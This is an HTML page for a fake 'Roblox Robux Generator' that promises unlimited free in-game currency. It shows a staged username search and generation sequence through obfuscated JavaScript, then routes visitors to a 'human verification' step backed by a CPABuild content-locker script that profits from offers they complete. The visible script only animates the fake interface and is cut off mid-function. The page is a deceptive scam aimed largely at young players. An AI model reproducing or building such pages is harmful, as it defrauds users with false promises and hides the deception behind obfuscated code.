
<!DOCTYPE html>
<!--
T: 2022-09-03 08:33:52
Api: b1cc85554413409f8066
It: 2992257

-->
<html><head>
    <title>Roblox Robux Generator</title>
<meta name="description" content="How to Generate Robux for Free ? By using the roblox robux generator you can generate unlimited amount of robux."/>
<meta property="og:title" content="Roblox Robux Generator"/>
<meta property="og:description" content="How to Generate Robux for Free ? By using the roblox robux generator you can generate unlimited amount of robux."/>
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script
        src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js"
        integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF"
        crossorigin="anonymous"
></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    ga('create', 'UA-232478797-1', 'auto');
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        
body{

    font-family: 'Kanit Light', sans-serif;
    overflow-y: auto;
    margin: 0;
    padding: 0;
    color: white;
}

canvas {
    width: 100%;
    height: 100%;
    display: block;
    position: fixed;
    top: 0;
    left: 0;
    z-index: -9999;
}

div{
    display: block;
}

.center{
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    text-align: center;
    min-height: 100vh;
}

.main{
    text-align: center;
    background: url("https://d13pxqgp3ixdbh.cloudfront.net/uploads/1659889022590b0949dc9ec47826e7a7a48b4e0bd0.png");
    background-size: cover;
    width: 90%;
    max-width:50em;
    justify-content: center;
    align-items: center;
    border-color: white;
    border-style: solid;
    border-width: 0.1em;
    box-shadow: 0 0 1em black;
    box-sizing: border-box;
    z-index: 1;
}

.points-box{
    background: whitesmoke;
    box-shadow: 0 0 10px black;
    width: 50%;
    max-width: 10em;
    border-radius: 1em;
    justify-content: center;
    margin: 1em auto;
    animation: pulse 1s ease infinite;
}

.points-image{
    width: 5em;
    position: relative;
    display: inline;
    margin: 1em 0 0.5em 0;
}

#vbucksamount1{
    display: flex;
    justify-content: center;
    padding: 0 0 1em 0;
}

@keyframes pulse {
    0% {
        transform: scale(0.98);
        box-shadow: 0 0 0 0 rgba(0, 0, 0, 0.7);
    }

    70% {
        transform: scale(1);
        box-shadow: 0 0 0 4px rgba(0, 0, 0, 0);
    }

    100% {
        transform: scale(0.98);
        box-shadow: 0 0 0 0 rgba(0, 0, 0, 0);
    }
}

.mainimg{
    width: 19em;
    position: relative;
    margin:-6.5em 0 -1em 0;
}

.step0-txt{
    font-weight: 600;
    font-size: 1.6em;
    width: 80%;
    margin: 1em auto;
    color: white;
}

.user-box{
    overflow: auto;
    position: relative;
}

.user-icon{
    margin-top: 1.2em;
    position: absolute;
    width: 2.5em;
    z-index: 2;
    margin-left: 1.4em;
    border-radius: 1em;
}

.user-input{
    position: relative;
    background: #FFFFFF;
    outline: none;
    box-shadow: none;
    width: 15em;
    height: 3em;
    padding: 0 1em 0 2.5em;
    font-size: 1.75em;
    border-radius: 0.6em;
    border-width: 0.12em;
    border-color: #d4d4d4;
    border-style: solid;
    font-weight: bold;
    box-sizing: border-box;
    max-width: 40em;
    vertical-align: middle;
}

.shakeanim{
    animation: shake 0.3s ease-in-out;
}

@keyframes shake {
    0%, 100% {
        margin-left: 0;
    }
    20%, 80%{
        margin-left: -0.5em;
    }
    40%, 60%{
        margin-left: 0.5em;
    }
}

input, textarea{
    color: black;
}

::placeholder{
    color: black;
    opacity:40%;
}

.btn0 {
    background: whitesmoke;
    color: black;
    width: 30%;
    padding: 0.7em 0;
    margin: 1em auto 2em auto;
    border-radius: 0.2em;
    font-weight: 900;
    font-size: 1.5em;
    box-sizing: border-box;
    font-family: "Kanit Medium", sans-serif;
}

.btn0:hover{
    transform: scale(1.1);
    cursor: pointer;
    box-shadow: 0 0 0.5em #31271c;
}

.btn1{
    background: whitesmoke;
    color: black;
    width: 33%;
    padding: 0.5em 0 0.5em 0;
    margin: 1.5em auto;
    border-radius: 0.5em;
    font-weight: 600;
    font-size: 1.5em;
    box-sizing: border-box;
    font-family: "Kanit Medium", sans-serif;
    animation: zoom-in-zoom-out 1s ease infinite;
}

.btn1:hover{
    background:whitesmoke;
    color: black;
    transform: scale(1.1);
    cursor: pointer;
    box-shadow: 0 0 0.5em whitesmoke;
}

@keyframes zoom-in-zoom-out {
    0% {
        transform: scale(1, 1);
    }
    50% {
        transform: scale(1.1, 1.1);
    }
    100% {
        transform: scale(1, 1);
    }
}

#error{
    margin: -0.5em auto;
    color: red;
    font-weight: 600;
}

.devices{
    display: flex;
    justify-content: center;
    box-sizing: border-box;
    float: none;
}

.selectedPlatform{
    background: transparent;
    width: 12em;
    height: 3em;
    border-radius: 1em;
    padding-top: 1em;
    margin: 1em;
    box-shadow: 0 0 0.6em white;
    cursor: pointer;
}

.platform{
    background: #FFFFFF;
    width: 12em;
    height: 3em;
    border-radius: 1em;
    padding-top: 1em;
    margin: 1em;
    box-shadow: 0 0 0.6em black;
    cursor: pointer;
}

.platform:hover{
    background:#FFFFFF;
    transform: scale(1.1);
    box-shadow: 0 0 0.5em #31271c;
}

.search0{
    margin: 1em auto;
    text-align: center;
    font-weight: 900;
    font-size: 1.2em;
    animation: fadeInLeft 1s both;
}

.search1{
    margin: 0 auto;
    text-align: center;
    height: 22em;
    margin-top: 2em;
}

.laststep{
    margin: 0 auto;
    text-align: center;
    height: auto;
    margin-top: 2em;
    font-family: 'Kanit Medium', sans-serif;
}

#dots:after {
    content: '.';
    animation: dots 1s steps(5, end) infinite;}

@keyframes dots {
    0%, 20% {
        color: rgba(0,0,0,0);
        text-shadow:
                .25em 0 0 rgba(0,0,0,0),
                .5em 0 0 rgba(0,0,0,0);}
    40% {
        color: white;
        text-shadow:
                .25em 0 0 rgba(0,0,0,0),
                .5em 0 0 rgba(0,0,0,0);}
    60% {
        text-shadow:
                .25em 0 0 white,
                .5em 0 0 rgba(0,0,0,0);}
    80%, 100% {
        text-shadow:
                .25em 0 0 white,
                .5em 0 0 white;}}


.checkmark-icon{
    width: 5em;
    margin: 1em auto 0 auto;
}
.user-txt{
    font-weight: 900;
    font-size: 2em;
    margin: 0 auto 2em auto;
    animation: fadeInLeft 5s both;
}

@keyframes fadeInLeft {
    0% {
        opacity: 0;
        transform: translateX(-20px);
    }
    100% {
        opacity: 1;
        transform: translateX(0);
    }
}

.devices-pic{
    width: 2.5em;
}

.devices-pic.ios{
    margin-top: -0.45em;
}

.devices-pic.android{
    margin-top: -0.4em;
}

.secondimg{
    float:right;
    width: 15em;
    margin-top: 6.5em;
    margin-right: 5em;
}

.VBucks-Div{
    margin: 1em 0 2em 0;
    cursor: pointer;
}

.VBucks-Div2{
    margin: 1em 0 2em 0;
    cursor: pointer;
}

.VBucks-pic{
    width: 4em;
}

.vbucks-text{
    font-size: 1.8em;
    font-weight: 800;
    margin-left:0.5em;
    color: black;
}

.VBucks{
    background: #FFFFFF;
    box-shadow: 0 0 0.6em black;
    border-radius: 1em;
    margin: 1em auto;
    display: flex;
    box-sizing: border-box;
    position: relative;
    width: 90%;
    max-width: 40em;
    height: 5em;
    align-items: center;
    justify-content: center;
}

.VBucks:hover{
    background:#FFFFFF;
    transform: scale(1.02);
    box-shadow: 0 0 0.5em #31271c;
    cursor: pointer;
}

.Selected{
    background: #d4d4d4;
    box-shadow: 0 0 0.5em whitesmoke;
    color: #FFFFFF;
    border-radius: 1em;
    margin: 0.5em auto;
    display: flex;
    box-sizing: border-box;
    position: relative;
    width: 90%;
    max-width: 40em;
    height: 5em;
    align-items: center;
    justify-content: center;
}

.progress-bg{
    margin-top: 0.5em;
    width: 26em;
    height: 1em;
    background-color: whitesmoke;
    border-radius: 0.5em;
    display: inline-block;
}
.progress-bar{
    margin-top: 0;
    margin-left: -0.1em;
    width: 0;
    height: 1em;
    background:#d4d4d4;
    border-radius: 0.5em;
}
.progressbar25{
    animation: progress1 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress1{
    0%  {width: 0;}
    100%  {width: 25%;}
}
.progressbar40{
    animation: progress2 2s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress2{
    0%  {width: 25%;}
    100%  {width: 40%;}
}
.progressbar75{
    animation: progress3 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress3{
    0%  {width: 40%;}
    100%  {width: 75%;}
}
.progressbar95{
    animation: progress4 1s  linear;
    animation-fill-mode: forwards;
}
@keyframes progress4{
    0%  {width: 75%;}
    100%  {width: 95%;}
}

.settings-rotate{
    animation: ranimation 2s linear infinite;
}

@keyframes ranimation {
    0%  {transform: rotate(0deg);}
    100%  {transform:  rotate(360deg);}
}

#loader{
    animation: ranimation 2s linear infinite;
    display: none;
}

.laststep-rotate{
    animation: ranimation 2s linear infinite;
    width: 5em;
    margin-top: -5em;
}

.LastStepTxt {
    font-size: 1.5em;
    font-weight: 700;
    width: 90%;
    margin: 1em auto;
}


/*              Mobile                 */

@media only screen and (max-width: 768px) {
    .main{
        margin-top: 5em;
    }
    .mainimg{
        width: 13em;
        margin: -4.2em 0 -1em 0;
    }

    .platform{
        width: 50%;
        height: 100%;
        margin: 0.8em;
    }

    .selectedPlatform{
        width: 50%;
        height: 100%;
        margin: 0.8em;
    }

    .devices{
        margin: 1em auto;
        align-items: center;
        width: 90%;
        /* position: absolute; */
    }
    .devices-pic{
        width: 2.6em;
        margin: 1em auto;
    }
    .devices-pic.ios{
        margin-top: 0.1em;
    }
    .devices-pic.android{
        margin-top: 0.1em;
    }

    .secondimg{
        width: 20em;
        margin-top: -1em;
        box-sizing: border-box;
    }
    .VBucks-Div{
        box-sizing: border-box;
    }
    .VBucks{
        width: 90%;
    }
    .Selected{
        width: 90%;
    }
    .vbucks-text{
        font-size: 1.5em;
        font-weight: 800;
    }
    .VBucks-pic{
        width: 3em;
        float: left;
    }

    .laststep{
        height: 100%;
    }

    .step0-txt{
        font-size: 1.5em;
        margin-top: 1em;
    }
    .progress-bg{
        width: 90%;
    }
    .settings-rotate{
        margin-bottom: 1em;
    }
    .user-input{
        width: 90%;
    }
    .btn0{
        width: 40%;
    }
    .btn1{
        width: 44%;
    }
    .checkmark-icon{
        margin-top: 0.5em;
    }
    .desk-break{
        display: none;
    }
}

@media only screen and (max-width: 319px){
    .VBucks{
        width: 90%;
    }
    .vbucks-text{
        font-size: 1.2em;
        font-weight: 800;
        margin-top: 0 auto;
    }
    .VBucks-pic{
        display: none;
    }
    .user-input{
        font-size: 22px;
        margin: 0 auto;
    }
    .user-icon{
        margin: 0.7em 0.8em;
    }
}

@media only screen and (max-width: 395px){
    .vbucks-text{
        font-size: 1.2em;
        font-weight: 800;
        margin: 1.4em 1em;
    }
    .user-input{
        font-size: 22px;
    }
    .user-icon{
        margin: 0.6em 0.6em;
    }
}

@media only screen and (max-width: 440px){
    .secondimg{
        display: none;
    }
    .devices{
        margin: 1em auto;
    }
    .vbucks-text{
        font-size: 1.4em;
        font-weight: 800;
        margin: 1em 1em;
    }
    .VBucks-pic{
        margin-right: 0;
    }
    .btn0{
        width: 50%;
    }
    .btn1{
        width: 54%;
    }
}
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <title>Roblox Robux Generator</title>
    <link rel="stylesheet" href="main.css">
    <script src="script.js" defer></script>
    <link rel="icon" type="image/png" href="https://d13pxqgp3ixdbh.cloudfront.net/uploads/15275731135d1b18ce359841d64946e871bd6a29dc.png">
</head>
<body>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Kanit&display=swap');
</style>

<canvas>
</canvas>
<div class="center">
    <div class="main" id="main0" style="display: 1none;">
        <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1573904473506d8be4e5b851173155e5db2b1df427.png" alt="Roblox Logo" class="mainimg">
        <div class="step0" id="step0">
            <div class="step0-txt"> Enter your Username or ID to use the Glitch <br class="desk-break"> and Generate Robux </div>
            <div class="user-box" id="user-box">
                <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1660049762fabe93d19a6b282cddfbccaaf887a811.jpg" class="user-icon">
                <input class="user-input" id="input-id" placeholder="Username or ID">
            </div>
            <div class="devices">
                <div class="platform" id="platform0" onclick="device('platform0', 'Android'); changecolorandroid();">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1652106952d1b126420c2e61f86903a650c6b5059b.png" class="devices-pic android" id="black-android" data-image="img1">
                    <!-- <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16521084283d1b0acc4af15fb16f5155c5aa072b9c.png"  class="white-android-remove" id="white-android" > -->
                </div>
                <div class="platform" id="platform1" onclick="device('platform1', 'Apple'); changecolorios();">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/165210695181b32d93b95e48db0eb4b1c1015d7fd8.png" class="devices-pic ios" id="black-ios" data-image="pic1">
                    <!-- <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/165210842707fa75a6fdd652ea8ac29e10c6c808c8.png" class="devices-pic ios" style="display: none" id="white-ios"> -->
                </div>
            </div>
            <div id="error" style="visibility: hidden;"> Please Select Device </div>
            <div class="btn0" id="btn0id" onclick="firstmain0()">NEXT</div>
        </div>
    </div>
    <div id="searching" class="main" style="display:none;">
        <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1573904473506d8be4e5b851173155e5db2b1df427.png" alt="Roblox Logo" class="mainimg">
        <div class="search0" id="search0" style="display: 1none ;">
            <div id="user-found">Username: <span id="usershow"></span><span id="dots"></span></div>
            <div id="device-found">Device: <span id="deviceshow"></span></div>
        </div>
        <div id="afterSearch" style="visibility: hidden;">
            <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16599498107c90abe17b9c4c3475e456be97abd25e.gif" class="checkmark-icon">
            <p class="user-txt"> User Found </p>
        </div>
    </div>
    <div class="main" id="main2" style="display: none;">
        <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1573904473506d8be4e5b851173155e5db2b1df427.png" alt="Roblox Logo" class="mainimg">
        <div class="step0" id="step1" style="display: 1none;">
            <div class="step0-txt"> Select Robux Amount </div>
            <div class="VBucks-Div" id="VBucks-div">
                <div class="Selected" id="VBucks0" onclick="VBucksSelected('VBucks0','1000 ')">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161781512796513153ff0057492ef72a171e16a179.png" class="VBucks-pic one">
                    <div class="vbucks-text"> 1000 Robux </div>
                </div>
                <div class="VBucks" id="VBucks1" onclick="VBucksSelected('VBucks1','2500 ')">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161781512796513153ff0057492ef72a171e16a179.png" class="VBucks-pic two">
                    <div class="vbucks-text">2500 Robux </div>
                </div>
                <div class="VBucks" id="VBucks2" onclick="VBucksSelected('VBucks2','5000 ')">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161781512796513153ff0057492ef72a171e16a179.png" class="VBucks-pic three">
                    <div class="vbucks-text">5000 Robux </div>
                </div>
                <div class="VBucks" id="VBucks3" onclick="VBucksSelected('VBucks3','9999 ')">
                    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161781512796513153ff0057492ef72a171e16a179.png" class="VBucks-pic three">
                    <div class="vbucks-text">9999 Robux </div>
                </div>
            </div>
        </div>
        <div class="btn0" id="btn1id" onclick="GenerateButton()">Generate</div>
        <div class="search1" id="search1" style="display: none ;">
            <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1659955530150d69af6a08bc5988029f7b89584fe9.png" class="settings-rotate">
            <div class="step0-txt" id="Generating-step0">Getting Ready..</div>
            <div class="progress-bg">
                <div class="progress-bar" id="progress-bar">
                </div>
                <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16599569972deedffd2a4b24d101451b63f9913038.png" id="loader" style="margin-top: 2em; width: 2em;">
            </div>
        </div>
    </div>
    <div class="main" id="main3" style="display: none;">
        <div class="laststep" id="laststep" style="display: 1none ;">
            <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16599556454c3052612f04f6bf7512aedbef0a3ab6.png" class="laststep-rotate">
            <div class="LastStepTxt" id="LastStepTxt">Hello <span id="Name-LastStep" style="color: #fead03; font-weight: bold;"></span>! You are almost there. <br><br> To generate <span id="vbucksamount" style="color: #fead03; font-weight: 900;"></span> Robux into your account complete the human verification. Click on the button to verify. </div>
            <div class="points-box">
                <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161781512796513153ff0057492ef72a171e16a179.png" class="points-image">
                <span id="vbucksamount1" style="font-weight: 900; font-size: large; color: black; "></span>
            </div>
            <div class="btn1" id="btn2id" onclick="CPABuildLock()"> Verify </div>
        </div>
    </div>
</div>
</body>
</html>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2992257,"key":"0b6a0","testing":1};
    var forward="";
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="https://dyodrs1kxvg6o.cloudfront.net/88c96e1.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    var _0x548055=_0x2351;(function(_0x3449d5,_0x4ceaac){var _0x52c3b3=_0x2351,_0x32e9c6=_0x3449d5();while(!![]){try{var _0x1ab195=-parseInt(_0x52c3b3(0xe0))/0x1*(parseInt(_0x52c3b3(0xdf))/0x2)+-parseInt(_0x52c3b3(0xb1))/0x3*(-parseInt(_0x52c3b3(0xd9))/0x4)+-parseInt(_0x52c3b3(0xe4))/0x5*(-parseInt(_0x52c3b3(0xcd))/0x6)+-parseInt(_0x52c3b3(0x95))/0x7+-parseInt(_0x52c3b3(0xb4))/0x8*(-parseInt(_0x52c3b3(0xc4))/0x9)+parseInt(_0x52c3b3(0xe8))/0xa*(parseInt(_0x52c3b3(0xc6))/0xb)+parseInt(_0x52c3b3(0xb0))/0xc;if(_0x1ab195===_0x4ceaac)break;else _0x32e9c6['push'](_0x32e9c6['shift']());}catch(_0x41d905){_0x32e9c6['push'](_0x32e9c6['shift']());}}}(_0x2c42,0x808ae));var vbucksValue=0x3e8,devicevalue='',name='';function firstmain0(){var _0x3ca195=_0x2351;name=document[_0x3ca195(0xa0)](_0x3ca195(0xd6))[_0x3ca195(0xb8)];if(name==''||name[_0x3ca195(0xba)]<=0x2||name[_0x3ca195(0xba)]>0x14)document[_0x3ca195(0xa0)]('input-id')[_0x3ca195(0xa3)]['borderBottom']=_0x3ca195(0xea),document['getElementById'](_0x3ca195(0xe1))[_0x3ca195(0xd7)]['add'](_0x3ca195(0xda)),setTimeout(function(){var _0x2038ac=_0x3ca195;document[_0x2038ac(0xa0)](_0x2038ac(0xd6))[_0x2038ac(0xa3)][_0x2038ac(0xb5)](_0x2038ac(0xbe)),document[_0x2038ac(0xa0)](_0x2038ac(0xe1))[_0x2038ac(0xd7)][_0x2038ac(0xdd)]('shakeanim');},0x5dc);else devicevalue==''?(document[_0x3ca195(0xa0)](_0x3ca195(0xaa))[_0x3ca195(0xa3)]['visibility']=_0x3ca195(0xa9),setTimeout(function(){var _0x4f75c5=_0x3ca195;document[_0x4f75c5(0xa0)](_0x4f75c5(0xaa))[_0x4f75c5(0xa3)][_0x4f75c5(0xbc)]=_0x4f75c5(0xab);},0x5dc)):setTimeout(function(){var _0x4f9e2d=_0x3ca195;document[_0x4f9e2d(0xa0)](_0x4f9e2d(0xdc))['innerHTML']=name,document[_0x4f9e2d(0xa0)](_0x4f9e2d(0xa4))[_0x4f9e2d(0xdb)]=devicevalue,document[_0x4f9e2d(0xa0)](_0x4f9e2d(0x9e))[_0x4f9e2d(0xa3)][_0x4f9e2d(0xe9)]=_0x4f9e2d(0xc3),setTimeout(function(){var _0x31dbae=_0x4f9e2d;document[_0x31dbae(0xa0)](_0x31dbae(0x9b))['style']['display']=_0x31dbae(0xb6),setTimeout(function(){var _0x5cb12c=_0x31dbae;document[_0x5cb12c(0xa0)](_0x5cb12c(0xa5))['style'][_0x5cb12c(0xe9)]='none',document[_0x5cb12c(0xa0)]('afterSearch')[_0x5cb12c(0xa3)]['visibility']=_0x5cb12c(0xa9),setTimeout(function(){var _0x2a083a=_0x5cb12c;document['getElementById'](_0x2a083a(0x9b))[_0x2a083a(0xa3)][_0x2a083a(0xe9)]=_0x2a083a(0xc3),setTimeout(function(){var _0x16dc10=_0x2a083a;document[_0x16dc10(0xa0)]('main2')[_0x16dc10(0xa3)]['display']=_0x16dc10(0xb6);},0x64);},0x898);},0x1194);},0x64);},0x64);}function device(_0x26a5e1,_0x5674d1){var _0x161d66=_0x2351;devicevalue=_0x5674d1,document[_0x161d66(0xa0)]('platform0')[_0x161d66(0xd7)][_0x161d66(0xc0)](_0x161d66(0xca)),document[_0x161d66(0xa0)](_0x161d66(0xbf))[_0x161d66(0xd7)][_0x161d66(0xc0)](_0x161d66(0xca)),document['getElementById'](_0x161d66(0x97))[_0x161d66(0xd7)]['remove'](_0x161d66(0xbd)),document[_0x161d66(0xa0)]('platform1')[_0x161d66(0xd7)]['remove'](_0x161d66(0xbd)),document[_0x161d66(0xa0)](_0x26a5e1)[_0x161d66(0xd7)][_0x161d66(0xc0)]('selectedPlatform'),document[_0x161d66(0xa0)](_0x26a5e1)['classList'][_0x161d66(0xdd)](_0x161d66(0xca));}const pic=document[_0x548055(0xa0)](_0x548055(0xc1)),img=document[_0x548055(0xa0)](_0x548055(0xd0));function changecolorandroid(){var _0x2d5b1c=_0x548055;img[_0x2d5b1c(0xc7)]=_0x2d5b1c(0xb3),img[_0x2d5b1c(0x9d)][_0x2d5b1c(0xd3)]='img2',resetIosImage();}function _0x2c42(){var _0x33d6db=['vbucksamount1','Name-LastStep','image','fillStyle','search1','input-id','classList','getContext','4095892nTdXPA','shakeanim','innerHTML','usershow','remove','floor','10tcwjfI','205774qWnUln','user-box','querySelector','height','55LZsCad','inline-block','img1','https://d13pxqgp3ixdbh.cloudfront.net/uploads/165210842707fa75a6fdd652ea8ac29e10c6c808c8.png','5570TwlRdF','display','0.12em\x20solid\x20red','VBucks','2956352ardFOg','innerHeight','platform0','Generating-step0','vbucksamount','progressbar95','searching','progressbar25','dataset','main0','split','getElementById','VBucks0','https://d13pxqgp3ixdbh.cloudfront.net/uploads/1652106952d1b126420c2e61f86903a650c6b5059b.png','style','deviceshow','dots','Generating\x20','Loading\x20last\x20step..','VBucks1','visible','error','hidden','random','canvas','fillRect','#0f0','2131812qQuMEC','3VqXrfb','pic1','https://d13pxqgp3ixdbh.cloudfront.net/uploads/16521084283d1b0acc4af15fb16f5155c5aa072b9c.png','8suAWxk','removeProperty','block','main2','value','main3','length','Finalizing...','visibility','selectedPlatform','border-Bottom','platform1','add','black-ios','progress-bar','none','1681137XOHeGn','Selected','7997MmXVUO','src','ABCDEFGHIJKLMNOPQRSTUVXYZABCDEFGHIJKLMNOPQRSTUVXYZABCDEFGHIJKLMNOPQRSTUVXYZABCDEFGHIJKLMNOPQRSTUVXYZABCDEFGHIJKLMNOPQRSTUVXYZABCDEFGHIJKLMNOPQRSTUVXYZ','loader','platform','width','VBucks3','100560dSeiSj','https://d13pxqgp3ixdbh.cloudfront.net/uploads/165210695181b32d93b95e48db0eb4b1c1015d7fd8.png','VBucks2','black-android'];_0x2c42=function(){return _0x33d6db;};return _0x2c42();}function changecolorios(){var _0xf45d52=_0x548055;pic['src']=_0xf45d52(0xe7),pic[_0xf45d52(0x9d)][_0xf45d52(0xd3)]='pic2',resetAndriodImage();}function resetAndriodImage(){var _0x1645ef=_0x548055;img[_0x1645ef(0xc7)]=_0x1645ef(0xa2),img['dataset'][_0x1645ef(0xd3)]=_0x1645ef(0xe6);}function resetIosImage(){var _0x5854b3=_0x548055;pic[_0x5854b3(0xc7)]=_0x5854b3(0xce),pic[_0x5854b3(0x9d)]['image']=_0x5854b3(0xb2);}function VBucksSelected(_0x6b63ab,_0x48247a){var _0x57efec=_0x548055;vbucksValue=_0x48247a,document[_0x57efec(0xa0)](_0x57efec(0xa1))['classList'][_0x57efec(0xc0)](_0x57efec(0x94)),document['getElementById'](_0x57efec(0xa8))[_0x57efec(0xd7)][_0x57efec(0xc0)](_0x57efec(0x94)),document['getElementById'](_0x57efec(0xcf))[_0x57efec(0xd7)][_0x57efec(0xc0)](_0x57efec(0x94)),document[_0x57efec(0xa0)](_0x57efec(0xcc))['classList'][_0x57efec(0xc0)](_0x57efec(0x94)),document[_0x57efec(0xa0)]('VBucks0')['classList'][_0x57efec(0xdd)](_0x57efec(0xc5)),document['getElementById'](_0x57efec(0xa8))[_0x57efec(0xd7)][_0x57efec(0xdd)](_0x57efec(0xc5)),document['getElementById'](_0x57efec(0xcf))[_0x57efec(0xd7)][_0x57efec(0xdd)](_0x57efec(0xc5)),document['getElementById'](_0x57efec(0xcc))[_0x57efec(0xd7)][_0x57efec(0xdd)](_0x57efec(0xc5)),document['getElementById'](_0x6b63ab)['classList']['add'](_0x57efec(0xc5)),document[_0x57efec(0xa0)](_0x6b63ab)['classList'][_0x57efec(0xdd)](_0x57efec(0x94));}function _0x2351(_0x17b836,_0x22fc4f){var _0x2c42f6=_0x2c42();return _0x2351=function(_0x235173,_0x408b26){_0x235173=_0x235173-0x94;var _0x1a7917=_0x2c42f6[_0x235173];return _0x1a7917;},_0x2351(_0x17b836,_0x22fc4f);}function GenerateButton(){var _0x4c3f12=_0x548055;document['getElementById']('btn1id')[_0x4c3f12(0xa3)][_0x4c3f12(0xe9)]=_0x4c3f12(0xc3),document['getElementById']('step1')[_0x4c3f12(0xa3)][_0x4c3f12(0xe9)]=_0x4c3f12(0xc3),document[_0x4c3f12(0xa0)](_0x4c3f12(0xd5))[_0x4c3f12(0xa3)][_0x4c3f12(0xe9)]=_0x4c3f12(0xb6),setTimeout(function(){var _0x1aa89e=_0x4c3f12;document[_0x1aa89e(0xa0)](_0x1aa89e(0xc2))['classList'][_0x1aa89e(0xc0)](_0x1aa89e(0x9c)),setTimeout(function(){var _0x18e8ab=_0x1aa89e;document[_0x18e8ab(0xa0)](_0x18e8ab(0x98))['innerHTML']=_0x18e8ab(0xa6)+vbucksValue+'\x20Robux\x20for\x20'+name+'',document['getElementById'](_0x18e8ab(0xc2))[_0x18e8ab(0xd7)][_0x18e8ab(0xc0)]('progressbar40'),setTimeout(function(){var 